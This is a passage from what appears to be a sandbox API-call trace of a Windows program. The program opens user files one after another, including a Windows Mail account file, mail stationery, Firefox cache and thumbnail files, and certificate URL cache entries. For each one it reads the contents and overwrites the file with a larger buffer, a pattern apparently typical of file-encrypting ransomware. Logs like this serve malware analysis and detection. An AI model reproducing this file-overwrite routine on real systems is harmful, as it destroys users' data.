lpUsedDefaultChar=0x0 | out: lpMultiByteStr="11_All_Pictures.wpl", lpUsedDefaultChar=0x0) returned 19 [0178.290] ReadFile (in: hFile=0x1fc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x249, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x2d5f2bc*=0x249, lpOverlapped=0x0) returned 1 [0178.292] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0178.292] WriteFile (in: hFile=0x1fc, lpBuffer=0x2897af8*, nNumberOfBytesToWrite=0x7d1, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2897af8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x7d1, lpOverlapped=0x0) returned 1 [0178.292] CloseHandle (hObject=0x1fc) returned 1 [0178.293] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\account{047ef9ce-9c1f-4250-9ca7-d206db8b643c}.oeaccount"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0178.294] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0178.294] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x5e4 [0178.294] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0178.294] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0178.294] ReleaseMutex (hMutex=0x168) returned 1 [0178.294] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0178.295] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", cchWideChar=55, lpMultiByteStr=0x1f96d14, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="account{047EF9CE-9C1F-4250-9CA7-D206DB8B643C}.oeaccount", lpUsedDefaultChar=0x0) returned 55 [0178.295] ReadFile (in: hFile=0x1fc, lpBuffer=0x26cf6b8, nNumberOfBytesToRead=0x5e4, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26cf6b8*, lpNumberOfBytesRead=0x2d5f2bc*=0x5e4, lpOverlapped=0x0) returned 1 [0179.443] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.443] WriteFile (in: hFile=0x1fc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0xb6c, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2d5f2d0*=0xb6c, lpOverlapped=0x0) returned 1 [0179.443] CloseHandle (hObject=0x1fc) returned 1 [0179.444] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.444] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.444] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xff [0179.445] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.445] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.445] ReleaseMutex (hMutex=0x168) returned 1 [0179.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0179.445] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Bears.htm", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Bears.htm", lpUsedDefaultChar=0x0) returned 9 [0179.445] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eea868, nNumberOfBytesToRead=0xff, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eea868*, lpNumberOfBytesRead=0x2d5f2bc*=0xff, lpOverlapped=0x0) returned 1 [0179.446] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.446] WriteFile (in: hFile=0x1fc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x687, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x687, lpOverlapped=0x0) returned 1 [0179.446] CloseHandle (hObject=0x1fc) returned 1 [0179.447] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.447] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.447] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xed [0179.448] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.448] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.448] ReleaseMutex (hMutex=0x168) returned 1 [0179.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0179.448] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Shades of Blue.htm", cchWideChar=18, lpMultiByteStr=0x1f8867c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Shades of Blue.htm", lpUsedDefaultChar=0x0) returned 18 [0179.448] ReadFile (in: hFile=0x1fc, lpBuffer=0x1ea4da8, nNumberOfBytesToRead=0xed, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4da8*, lpNumberOfBytesRead=0x2d5f2bc*=0xed, lpOverlapped=0x0) returned 1 [0179.450] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.450] WriteFile (in: hFile=0x1fc, lpBuffer=0x2663858*, nNumberOfBytesToWrite=0x675, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2663858*, lpNumberOfBytesWritten=0x2d5f2d0*=0x675, lpOverlapped=0x0) returned 1 [0179.451] CloseHandle (hObject=0x1fc) returned 1 [0179.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\1\\C2\\0B619d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\1\\c2\\0b619d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xaa05 [0179.452] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.452] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.452] ReleaseMutex (hMutex=0x168) returned 1 [0179.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0B619d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0179.453] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="0B619d01", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0B619d01", lpUsedDefaultChar=0x0) returned 8 [0179.453] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0179.455] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9a05 [0179.455] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.456] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x9a05 [0179.456] WriteFile (in: hFile=0x1fc, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.456] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0179.456] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0179.457] CloseHandle (hObject=0x1fc) returned 1 [0179.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.458] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.458] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x8266 [0179.458] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.458] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.458] ReleaseMutex (hMutex=0x168) returned 1 [0179.458] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="71469d01", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0179.459] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="71469d01", cchWideChar=8, lpMultiByteStr=0x1f7356c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="71469d01", lpUsedDefaultChar=0x0) returned 8 [0179.459] ReadFile (in: hFile=0x1fc, lpBuffer=0x25a56a8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0179.460] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7266 [0179.460] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.461] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x7266 [0179.461] WriteFile (in: hFile=0x1fc, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.461] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0179.462] WriteFile (in: hFile=0x1fc, lpBuffer=0x25a56a8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a56a8*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0179.462] CloseHandle (hObject=0x1fc) returned 1 [0179.462] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\safebrowsing\\test-malware-simple.cache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.463] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.463] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2c [0179.463] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.463] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.463] ReleaseMutex (hMutex=0x168) returned 1 [0179.463] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-malware-simple.cache", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0179.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="test-malware-simple.cache", cchWideChar=25, lpMultiByteStr=0x1f8fd5c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="test-malware-simple.cache", lpUsedDefaultChar=0x0) returned 25 [0179.464] ReadFile (in: hFile=0x1fc, lpBuffer=0x1fa54d8, nNumberOfBytesToRead=0x2c, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fa54d8*, lpNumberOfBytesRead=0x2d5f2bc*=0x2c, lpOverlapped=0x0) returned 1 [0179.465] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.465] WriteFile (in: hFile=0x1fc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5b4, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x5b4, lpOverlapped=0x0) returned 1 [0179.465] CloseHandle (hObject=0x1fc) returned 1 [0179.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\mozilla\\firefox\\profiles\\silmbjec.default\\thumbnails\\ba182bcd131f1f3c6b6fbbb1ba078341.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.466] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.466] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x40b0 [0179.466] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.467] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.467] ReleaseMutex (hMutex=0x168) returned 1 [0179.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ba182bcd131f1f3c6b6fbbb1ba078341.png", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0179.467] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ba182bcd131f1f3c6b6fbbb1ba078341.png", cchWideChar=36, lpMultiByteStr=0x1fa54dc, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ba182bcd131f1f3c6b6fbbb1ba078341.png", lpUsedDefaultChar=0x0) returned 36 [0179.467] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.469] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x30b0 [0179.469] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0179.470] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x30b0 [0179.470] WriteFile (in: hFile=0x1fc, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0179.470] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0179.470] WriteFile (in: hFile=0x1fc, lpBuffer=0x26ae978*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0179.470] CloseHandle (hObject=0x1fc) returned 1 [0179.471] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\1DAF2884EC4DFA96BA4A58D4DBC9C406" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\1daf2884ec4dfa96ba4a58d4dbc9c406"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.472] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.472] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf1d [0179.472] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.472] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.473] ReleaseMutex (hMutex=0x168) returned 1 [0179.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1DAF2884EC4DFA96BA4A58D4DBC9C406", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0179.473] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="1DAF2884EC4DFA96BA4A58D4DBC9C406", cchWideChar=32, lpMultiByteStr=0x1fa54dc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="1DAF2884EC4DFA96BA4A58D4DBC9C406", lpUsedDefaultChar=0x0) returned 32 [0179.473] ReadFile (in: hFile=0x1fc, lpBuffer=0x26ae978, nNumberOfBytesToRead=0xf1d, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26ae978*, lpNumberOfBytesRead=0x2d5f2bc*=0xf1d, lpOverlapped=0x0) returned 1 [0179.474] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0179.474] WriteFile (in: hFile=0x1fc, lpBuffer=0x25ad708*, nNumberOfBytesToWrite=0x14a5, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25ad708*, lpNumberOfBytesWritten=0x2d5f2d0*=0x14a5, lpOverlapped=0x0) returned 1 [0179.475] CloseHandle (hObject=0x1fc) returned 1 [0179.475] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0179.475] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.475] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x2d7 [0179.476] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0179.476] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0179.476] ReleaseMutex (hMutex=0x168) returned 1 [0179.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cchWideChar=65, 